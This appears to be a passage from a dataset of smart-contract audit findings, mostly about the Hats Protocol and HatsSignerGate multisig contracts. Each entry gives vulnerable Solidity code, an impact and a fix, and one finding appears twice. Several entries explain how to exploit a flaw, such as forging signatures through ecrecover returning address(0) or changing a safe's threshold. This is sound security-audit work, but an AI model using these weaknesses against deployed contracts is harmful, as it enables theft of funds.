min) _threshold = min;\\n else if (count > max) _threshold = max;\\n else _threshold = count;\\n}\\n```\\n\\nAs we can see, this means that the safe's threshold after the transaction must equal the valid signers, bounded by the `minThreshold` and `maxThreshold`.\\nHowever, this check does not ensure that the value returned by `_getCorrectThreshold()` is the same before and after the transaction. As a result, as long as the number of owners is also changed in the transaction, the condition can be upheld.\\nTo illustrate, let's look at an example:\\nBefore the transaction, there are 8 owners on the vault, all signers. targetThreshold == 10 and minThreshold == 2, so the safe's threshold is 8 and everything is good.\\nThe transaction calls `removeOwner()`, removing an owner from the safe and adjusting the threshold down to 7.\\nAfter the transaction, there will be 7 owners on the vault, all signers, the safe's threshold will be 7, and the check will pass.\\nThis simple example focuses on using `removeOwner()` once to decrease the threshold. However, it is also possible to use the safe's multicall functionality to call `removeOwner()` multiple times, changing the threshold more dramatically.
Save the safe's current threshold in `checkTransaction()` before the transaction has executed, and compare the value after the transaction to that value from storage.
Signers can change the threshold of the vault, giving themselves increased control over future transactions and breaking an important trust assumption of the protocol.
```\\nif (safe.getThreshold() != _getCorrectThreshold()) {\\n revert SignersCannotChangeThreshold();\\n}\\n```\\n
Hats can be overwritten
medium
Child hats can be created under a non-existent admin. Creating the admin allows overwriting the properties of the child-hats, which goes against the immutability of hats.\\n```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n\\nNow, the next eligible hat for this admin is 1.1.1, which is a hat that was already created and minted. This can allow the admin to change the properties of the child, even if the child hat was previously immutable. This contradicts the immutability of hats, and can be used to rug users in multiple ways, and is thus classified as high severity. This attack can be carried out by any hat wearer on their child tree, mutating their properties.
Check if admin exists, before minting by checking any of its properties against default values\\n```\\nrequire(_hats[admin].maxSupply > 0, "Admin not created")\\n```\\n
null
```\\n function _createHat(\\n uint256 _id,\\n string calldata _details,\\n uint32 _maxSupply,\\n address _eligibility,\\n address _toggle,\\n bool _mutable,\\n string calldata _imageURI\\n ) internal returns (Hat memory hat) {\\n hat.details = _details;\\n hat.maxSupply = _maxSupply;\\n hat.eligibility = _eligibility;\\n hat.toggle = _toggle;\\n hat.imageURI = _imageURI;\\n hat.config = _mutable ? uint96(3 << 94) : uint96(1 << 95);\\n _hats[_id] = hat;\\n\\n\\n emit HatCreated(_id, _details, _maxSupply, _eligibility, _toggle, _mutable, _imageURI);\\n }\\n```\\n
targetThreshold can be set below minThreshold, violating important invariant
medium
There are protections in place to ensure that `minThreshold` is not set above `targetThreshold`, because the result is that the max threshold on the safe would be less than the minimum required. However, this check is not performed when `targetThreshold` is set, which results in the same situation.\\nWhen the `minThreshold` is set on `HatsSignerGateBase.sol`, it performs an important check that `minThreshold` <= targetThreshold:\\n```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n\\nHowever, when `targetThreshold` is set, there is no equivalent check that it remains above minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n\\nThis is a major problem, because if it is set lower than `minThreshold`, `reconcileSignerCount()` will set the safe's threshold to be this value, which is lower than the minimum, and will cause all tranasctions to fail.
Perform a check in `_setTargetThreshold()` that it is greater than or equal to minThreshold:\\n```\\nfunction _setTargetThreshold(uint256 _targetThreshold) internal {\\n// Add the line below\\n if (_targetThreshold < minThreshold) {\\n// Add the line below\\n revert InvalidTargetThreshold();\\n// Add the line below\\n }\\n if (_targetThreshold > maxSigners) {\\n revert InvalidTargetThreshold();\\n }\\n\\n targetThreshold = _targetThreshold;\\n}\\n```\\n
Settings that are intended to be guarded are not, which can lead to parameters being set in such a way that all transactions fail.
```\\nfunction _setMinThreshold(uint256 _minThreshold) internal {\\n if (_minThreshold > maxSigners || _minThreshold > targetThreshold) {\\n revert InvalidMinThreshold();\\n }\\n\\n minThreshold = _minThreshold;\\n}\\n```\\n
Swap Signer fails if final owner is invalid due to off by one error in loop
medium
New users attempting to call `claimSigner()` when there is already a full slate of owners are supposed to kick any invalid owners off the safe in order to swap in and take their place. However, the loop that checks this has an off-by-one error that misses checking the final owner.\\nWhen `claimSigner()` is called, it adds the `msg.sender` as a signer, as long as there aren't already too many owners on the safe.\\nHowever, in the case that there are already the maximum number of owners on the safe, it performs a check whether any of them are invalid. If they are, it swaps out the invalid owner for the new owner.\\n```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n\\n```\\nfunction _swapSigner(\\n address[] memory _owners,\\n uint256 _ownerCount,\\n uint256 _maxSigners,\\n uint256 _currentSignerCount,\\n address _signer\\n) internal returns (bool success) {\\n address ownerToCheck;\\n bytes memory data;\\n\\n for (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n _findPrevOwner(_owners, ownerToCheck), // prevOwner\\n ownerToCheck, // oldOwner\\n _signer // newOwner\\n );\\n\\n // execute the swap, reverting if it fails for some reason\\n success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecRemoveSigner();\\n }\\n\\n if (_currentSignerCount < _maxSigners) ++signerCount;\\n break;\\n }\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nThis function is intended to iterate through all the owners, check if any is no longer valid, and — if that's the case — swap it for the new one.\\nHowever, in the case that all owners are valid except for the final one, it will miss the swap and reject the new owner.\\nThis is because there is an off by one error in the loop, where it iterates through `for (uint256 i; i < _ownerCount - 1;)...`\\nThis only iterates through all the owners up until the final one, and will miss the check for the validity and possible swap of the final owner.
Perform the loop with `ownerCount` instead of `ownerCount - 1` to check all owners:\\n```\\n// Remove the line below\\n for (uint256 i; i < _ownerCount // Remove the line below\\n 1;) {\\n// Add the line below\\n for (uint256 i; i < _ownerCount ;) {\\n ownerToCheck = _owners[i];\\n // rest of code\\n}\\n```\\n
When only the final owner is invalid, new users will not be able to claim their role as signer, even through they should.
```\\nif (ownerCount >= maxSigs) {\\n bool swapped = _swapSigner(owners, ownerCount, maxSigs, currentSignerCount, msg.sender);\\n if (!swapped) {\\n // if there are no invalid owners, we can't add a new signer, so we revert\\n revert NoInvalidSignersToReplace();\\n }\\n}\\n```\\n
If a hat is owned by address(0), phony signatures will be accepted by the safe
medium
If a hat is sent to `address(0)`, the multisig will be fooled into accepting phony signatures on its behalf. This will throw off the proper accounting of signatures, allowing non-majority transactions to pass and potentially allowing users to steal funds.\\nIn order to validate that all signers of a transaction are valid signers, `HatsSignerGateBase.sol` implements the `countValidSignatures()` function, which recovers the signer for each signature and checks `isValidSigner()` on them.\\nThe function uses `ecrecover` to get the signer. However, `ecrecover` is well known to return `address(0)` in the event that a phony signature is passed with a `v` value other than 27 or 28. See this example for how this can be done.\\nIn the event that this is a base with only a single hat approved for signing, the `isValidSigner()` function will simply check if the owner is the wearer of a hat:\\n```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n\\nOn the `Hats.sol` contract, this simply checks their balance:\\n```\\nfunction isWearerOfHat(address _user, uint256 _hatId) public view returns (bool isWearer) {\\n isWearer = (balanceOf(_user, _hatId) > 0);\\n}\\n```\\n\\n... which only checks if it is active or eligible...\\n```\\nfunction balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n{\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n}\\n```\\n\\n... which calls out to ERC1155, which just returns the value in storage (without any address(0) check)...\\n```\\nfunction balanceOf(address owner, uint256 id) public view virtual returns (uint256 balance) {\\n balance = _balanceOf[owner][id];\\n}\\n```\\n\\nThe result is that, if a hat ends up owned by `address(0)` for any reason, this will give blanket permission for anyone to create a phony signature that will be accepted by the safe.\\nYou could imagine a variety of situations where this may apply:\\nAn admin minting a mutable hat to address(0) to adjust the supply while waiting for a delegatee to send over their address to transfer the hat to\\nAn admin sending a hat to address(0) because there is some reason why they need the supply slightly inflated\\nAn admin accidentally sending a hat to address(0) to burn it\\nNone of these examples are extremely likely, but there would be no reason for the admin to think they were putting their multisig at risk for doing so. However, the result would be a free signer on the multisig, which would have dramatic consequences.
The easiest option is to add a check in `countValidSignatures()` that confirms that `currentOwner != address(0)` after each iteration.
If a hat is sent to `address(0)`, any phony signature can be accepted by the safe, leading to transactions without sufficient support being executed.\\nThis is particularly dangerous in a 2/3 situation, where this issue would be sufficient for a single party to perform arbitrary transactions.
```\\nfunction isValidSigner(address _account) public view override returns (bool valid) {\\n valid = HATS.isWearerOfHat(_account, signersHatId);\\n}\\n```\\n
If signer gate is deployed to safe with more than 5 existing modules, safe will be bricked
medium
`HatsSignerGate` can be deployed with a fresh safe or connected to an existing safe. In the event that it is connected to an existing safe, it pulls the first 5 modules from that safe to count the number of connected modules. If there are more than 5 modules, it silently only takes the first five. This results in a mismatch between the real number of modules and `enabledModuleCount`, which causes all future transactions to revert.\\nWhen a `HatsSignerGate` is deployed to an existing safe, it pulls the existing modules with the following code:\\n```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n\\nBecause the modules are requested paginated with `5` as the second argument, it will return a maximum of `5` modules. If the safe already has more than `5` modules, only the first `5` will be returned.\\nThe result is that, while the safe has more than 5 modules, the gate will be set up with `enabledModuleCount = 5 + 1`.\\nWhen a transaction is executed, `checkTransaction()` will get the hash of the first 6 modules:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount);\\n_existingModulesHash = keccak256(abi.encode(modules));\\n```\\n\\nAfter the transaction, the first 7 modules will be checked to compare it:\\n```\\n(address[] memory modules,) = safe.getModulesPaginated(SENTINEL_OWNERS, enabledModuleCount + 1);\\nif (keccak256(abi.encode(modules)) != _existingModulesHash) {\\n revert SignersCannotChangeModules();\\n}\\n```\\n\\nSince it already had more than 5 modules (now 6, with HatsSignerGate added), there will be a 7th module and the two hashes will be different. This will cause a revert.\\nThis would be a high severity issue, except that in the comments for the function it says:\\n/// @dev Do not attach HatsSignerGate to a Safe with more than 5 existing modules; its signers will not be able to execute any transactions\\nThis is the correct recommendation, but given the substantial consequences of getting it wrong, it should be enforced in code so that a safe with more modules reverts, rather than merely suggested in the comments.
The `deployHatsSignerGate()` function should revert if attached to a safe with more than 5 modules:\\n```\\nfunction deployHatsSignerGate(\\n uint256 _ownerHatId,\\n uint256 _signersHatId,\\n address _safe, // existing Gnosis Safe that the signers will join\\n uint256 _minThreshold,\\n uint256 _targetThreshold,\\n uint256 _maxSigners\\n) public returns (address hsg) {\\n // count up the existing modules on the safe\\n (address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\n uint256 existingModuleCount = modules.length;\\n// Add the line below\\n (address[] memory modulesWithSix,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 6);\\n// Add the line below\\n if (modules.length != moduleWithSix.length) revert TooManyModules();\\n\\n return _deployHatsSignerGate(\\n _ownerHatId, _signersHatId, _safe, _minThreshold, _targetThreshold, _maxSigners, existingModuleCount\\n );\\n}\\n```\\n
If a HatsSignerGate is deployed and connected to a safe with more than 5 existing modules, all future transactions sent through that safe will revert.
```\\n(address[] memory modules,) = GnosisSafe(payable(_safe)).getModulesPaginated(SENTINEL_MODULES, 5);\\nuint256 existingModuleCount = modules.length;\\n```\\n
[Medium][Outdated State] `_removeSigner` incorrectly updates `signerCount` and safe `threshold`
medium
`_removeSigner` can be called whenever a signer is no longer valid to remove an invalid signer. However, under certain situations, `removeSigner` incorrectly reduces the number of `signerCount` and sets the `threshold` incorrectly.\\n`_removeSigner` uses the code snippet below to decide if the number of `signerCount` should be reduced:\\n```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n\\nIf first clause is supposed to be activated when `validSignerCount` and `currentSignerCount` are still in sync, and we want to remove an invalid signer. The second clause is for when we need to identify a previously active signer which is inactive now and want to remove it. However, it does not take into account if a previously in-active signer became active. In the scenario described below, the `signerCount` would be updated incorrectly:\\n(1) Lets imagine there are 5 signers where 0, 1 and 2 are active while 3 and 4 are inactive, the current `signerCount = 3` (2) In case number 3 regains its hat, it will become active again (3) If we want to delete signer 4 from the owners' list, the `_removeSigner` function will go through the signers and find 4 valid signers, since there were previously 3 signers, `validSignerCount == currentSignerCount` would be false. (4) In this case, while the number of `validSingerCount` increased, the `_removeSigner` reduces one.
Check if the number of `validSignerCount` decreased instead of checking equality:\\n```\\n@line 387 HatsSignerGateBase\\n- if (validSignerCount == currentSignerCount) {\\n+ if (validSignerCount >= currentSignerCount) {\\n```\\n
This can make the `signerCount` and safe `threshold` to update incorrectly which can cause further problems, such as incorrect number of signatures needed.
```\\n if (validSignerCount == currentSignerCount) {\\n newSignerCount = currentSignerCount;\\n } else {\\n newSignerCount = currentSignerCount - 1;\\n }\\n```\\n
The Hats contract needs to override the ERC1155.balanceOfBatch function
medium
The Hats contract does not override the ERC1155.balanceOfBatch function\\nThe Hats contract overrides the ERC1155.balanceOf function to return a balance of 0 when the hat is inactive or the wearer is ineligible.\\n```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n\\nBut the Hats contract does not override the ERC1155.balanceOfBatch function, which causes balanceOfBatch to return the actual balance no matter what the circumstances.\\n```\\n function balanceOfBatch(address[] calldata owners, uint256[] calldata ids)\\n public\\n view\\n virtual\\n returns (uint256[] memory balances)\\n {\\n require(owners.length == ids.length, "LENGTH_MISMATCH");\\n\\n balances = new uint256[](owners.length);\\n\\n // Unchecked because the only math done is incrementing\\n // the array index counter which cannot possibly overflow.\\n unchecked {\\n for (uint256 i = 0; i < owners.length; ++i) {\\n balances[i] = _balanceOf[owners[i]][ids[i]];\\n }\\n }\\n }\\n```\\n
Consider overriding the ERC1155.balanceOfBatch function in Hats contract to return 0 when the hat is inactive or the wearer is ineligible.
This will make balanceOfBatch return a different result than balanceOf, which may cause errors when integrating with other projects
```\\n function balanceOf(address _wearer, uint256 _hatId)\\n public\\n view\\n override(ERC1155, IHats)\\n returns (uint256 balance)\\n {\\n Hat storage hat = _hats[_hatId];\\n\\n balance = 0;\\n\\n if (_isActive(hat, _hatId) && _isEligible(_wearer, hat, _hatId)) {\\n balance = super.balanceOf(_wearer, _hatId);\\n }\\n }\\n```\\n
Unbound recursive function call can use unlimited gas and break hats operation
medium
some of the functions in the Hats and HatsIdUtilities contracts has recursive logics without limiting the number of iteration, this can cause unlimited gas usage if hat trees has huge depth and it won't be possible to call the contracts functions. functions `getImageURIForHat()`, `isAdminOfHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` would revert and because most of the logics callings those functions so contract would be in broken state for those hats.\\nThis is function `isAdminOfHat()` code:\\n```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n\\nAs you can see this function calls itself recursively to check that if user is wearer of the one of the upper link hats of the hat or not. if the chain(depth) of the hats in the tree become very long then this function would revert because of the gas usage and the gas usage would be high enough so it won't be possible to call this function in a transaction. functions `getImageURIForHat()`, `getTippyTopHatDomain()` and `noCircularLinkage()` has similar issues and the gas usage is depend on the tree depth. the issue can happen suddenly for hats if the top level topHat decide to add link, for example:\\nHat1 is linked to chain of the hats that has 1000 "root hat" and the topHat (tippy hat) is TIPHat1.\\nHat2 is linked to chain of the hats that has 1000 "root hat" and the topHat (tippy hat) is TIPHat2.\\nadmin of the TIPHat1 decides to link it to the Hat2 and all and after performing that the total depth of the tree would increase to 2000 and transactions would cost double time gas.
code should check and make sure that hat levels has a maximum level and doesn't allow actions when this level breaches. (keep depth of each tophat's tree and update it when actions happens and won't allow actions if they increase depth higher than the threshold)
it won't be possible to perform actions for those hats and funds can be lost because of it.
```\\n function isAdminOfHat(address _user, uint256 _hatId) public view returns (bool isAdmin) {\\n uint256 linkedTreeAdmin;\\n uint32 adminLocalHatLevel;\\n if (isLocalTopHat(_hatId)) {\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n return isAdmin = isWearerOfHat(_user, _hatId);\\n } else {\\n // tree is linked\\n if (isWearerOfHat(_user, linkedTreeAdmin)) {\\n return isAdmin = true;\\n } // user wears the treeAdmin\\n else {\\n adminLocalHatLevel = getLocalHatLevel(linkedTreeAdmin);\\n _hatId = linkedTreeAdmin;\\n }\\n }\\n } else {\\n // if we get here, _hatId is not a tophat of any kind\\n // get the local tree level of _hatId's admin\\n adminLocalHatLevel = getLocalHatLevel(_hatId) - 1;\\n }\\n\\n // search up _hatId's local address space for an admin hat that the _user wears\\n while (adminLocalHatLevel > 0) {\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, adminLocalHatLevel))) {\\n return isAdmin = true;\\n }\\n // should not underflow given stopping condition > 0\\n unchecked {\\n --adminLocalHatLevel;\\n }\\n }\\n\\n // if we get here, we've reached the top of _hatId's local tree, ie the local tophat\\n // check if the user wears the local tophat\\n if (isWearerOfHat(_user, getAdminAtLocalLevel(_hatId, 0))) return isAdmin = true;\\n\\n // if not, we check if it's linked to another tree\\n linkedTreeAdmin = linkedTreeAdmins[getTopHatDomain(_hatId)];\\n if (linkedTreeAdmin == 0) {\\n // tree is not linked\\n // we've already learned that user doesn't wear the local tophat, so there's nothing else to check; we return false\\n return isAdmin = false;\\n } else {\\n // tree is linked\\n // check if user is wearer of linkedTreeAdmin\\n if (isWearerOfHat(_user, linkedTreeAdmin)) return true;\\n // if not, recurse to traverse the parent tree for a hat that the user wears\\n isAdmin = isAdminOfHat(_user, linkedTreeAdmin);\\n }\\n }\\n```\\n
Owners can be swapped even though they still wear their signer hats
medium
`HatsSignerGateBase` does not check for a change of owners post-flight. This allows a group of actors to collude and replace opposing signers with cooperating signers, even though the replaced signers still wear their signer hats.\\nThe `HatsSignerGateBase` performs various checks to prevent a multisig transaction to tamper with certain variables. Something that is currently not checked for in `checkAfterExecution` is a change of owners. A colluding group of malicious signers could abuse this to perform swaps of safe owners by using a delegate call to a corresponding malicious contract. This would bypass the requirement of only being able to replace an owner if he does not wear his signer hat anymore as used in _swapSigner:\\n```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n // rest of code\\n```\\n
Perform a pre- and post-flight comparison on the safe owners, analogous to what is currently done with the modules.
bypass restrictions and perform action that should be disallowed.
```\\nfor (uint256 i; i < _ownerCount - 1;) {\\n ownerToCheck = _owners[i];\\n\\n if (!isValidSigner(ownerToCheck)) {\\n // prep the swap\\n data = abi.encodeWithSignature(\\n "swapOwner(address,address,address)",\\n // rest of code\\n```\\n
Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold
high
The safe's threshold is supposed to be set with the lower value of the `validSignerCount` and the `targetThreshold` (intended to serve as the maximum). However, the wrong value is used in the call to the safe's function, which in some circumstances can lead to the safe being permanently bricked.\\nIn `reconcileSignerCount()`, the valid signer count is calculated. We then create a value called `newThreshold`, and set it to the minimum of the valid signer count and the target threshold. This is intended to be the value that we update the safe's threshold with.\\n```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n\\nHowever, there is a typo in the contract call, which accidentally uses `validSignerCount` instead of `newThreshold`.\\nThe result is that, if there are more valid signers than the `targetThreshold` that was set, the threshold will be set higher than intended, and the threshold check in `checkAfterExecution()` will fail for being above the max, causing all safe transactions to revert.\\nThis is a major problem because it cannot necessarily be fixed. In the event that it is a gate with a single hat signer, and the eligibility module for the hat doesn't have a way to turn off eligibility, there will be no way to reduce the number of signers. If this number is greater than `maxSigners`, there is no way to increase `targetThreshold` sufficiently to stop the reverting.\\nThe result is that the safe is permanently bricked, and will not be able to perform any transactions.
Issue Safe can be bricked because threshold is updated with validSignerCount instead of newThreshold\\nChange the value in the function call from `validSignerCount` to `newThreshold`.\\n```\\nif (newThreshold > 0) {\\n// Remove the line below\\n bytes memory data = abi.encodeWithSignature("changeThreshold(uint256)", validSignerCount);\\n// Add the line below\\n bytes memory data = abi.encodeWithSignature("changeThreshold(uint256)", newThreshold);\\n\\n bool success = safe.execTransactionFromModule(\\n address(safe), // to\\n 0, // value\\n data, // data\\n Enum.Operation.Call // operation\\n );\\n\\n if (!success) {\\n revert FailedExecChangeThreshold();\\n }\\n}\\n```\\n
All transactions will revert until `validSignerCount` can be reduced back below `targetThreshold`, which re
```\\nif (validSignerCount <= target && validSignerCount != currentThreshold) {\\n newThreshold = validSignerCount;\\n} else if (validSignerCount > target && currentThreshold < target) {\\n newThreshold = target;\\n}\\n```\\n
Changing hat toggle address can lead to unexpected changes in status
medium
Changing the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.
The `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.
Hats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.
```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n
Changing hat toggle address can lead to unexpected changes in status
medium
Changing the toggle address should not change the current status unless intended to. However, in the event that a contract's toggle status hasn't been synced to local state, this change can accidentally toggle the hat back on when it isn't intended.\\nWhen an admin for a hat calls `changeHatToggle()`, the `toggle` address is updated to a new address they entered:\\n```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n\\nToggle addresses can be either EOAs (who must call `setHatStatus()` to change the local config) or contracts (who must implement the `getHatStatus()` function and return the value).\\nThe challenge comes if a hat has a toggle address that is a contract. The contract changes its toggle value to `false` but is never checked (which would push the update to the local state). The admin thus expects that the hat is turned off.\\nThen, the toggle is changed to an EOA. One would expect that, until a change is made, the hat would remain in the same state, but in this case, the hat defaults back to its local storage state, which has not yet been updated and is therefore set to `true`.\\nEven in the event that the admin knows this and tries to immediately toggle the status back to `false`, it is possible for a malicious user to sandwich their transaction between the change to the EOA and the transaction to toggle the hat off, making use of a hat that should be off. This could have dramatic consequences when hats are used for purposes such as multisig signing.
The `changeHatToggle()` function needs to call `checkHatToggle()` before changing over to the new toggle address, to ensure that the latest status is synced up.
Hats may unexpectedly be toggled from `off` to `on` during toggle address transfer, reactivating hats that are intended to be turned `off`.
```\\nfunction changeHatToggle(uint256 _hatId, address _newToggle) external {\\n if (_newToggle == address(0)) revert ZeroAddress();\\n\\n _checkAdmin(_hatId);\\n Hat storage hat = _hats[_hatId];\\n\\n if (!_isMutable(hat)) {\\n revert Immutable();\\n }\\n\\n hat.toggle = _newToggle;\\n\\n emit HatToggleChanged(_hatId, _newToggle);\\n}\\n```\\n
Precision differences when calculating userCollateralRatioMantissa causes major issues for some token pairs
high
When calculating userCollateralRatioMantissa in borrow and liquidate. It divides the raw debt value (in loan token precision) by the raw collateral balance (in collateral precision). This skew is fine for a majority of tokens but will cause issues with specific token pairs, including being unable to liquidate a subset of positions no matter what.\\nWhen calculating userCollateralRatioMantissa, both debt value and collateral values are left in the native precision. As a result of this certain token pairs will be completely broken because of this. Other pairs will only be partially broken and can enter state in which it's impossible to liquidate positions.\\nImagine a token pair like USDC and SHIB. USDC has a token precision of 6 and SHIB has 18. If the user has a collateral balance of 100,001 SHIB (100,001e18) and a loan borrow of 1 USDC (1e6) then their userCollateralRatioMantissa will actually calculate as zero:\\n```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n\\nThere are two issues with this. First is that a majority of these tokens simply won't work. The other issue is that because userCollateralRatioMantissa returns 0 there are states in which some debt is impossible to liquidate breaking a key invariant of the protocol.\\nAny token with very high or very low precision will suffer from this.
userCollateralRatioMantissa should be calculated using debt and collateral values normalized to 18 decimal points
Some token pairs will always be/will become broken
```\\n1e6 * 1e18 / 100,001e18 = 0\\n```\\n
Fee share calculation is incorrect
medium
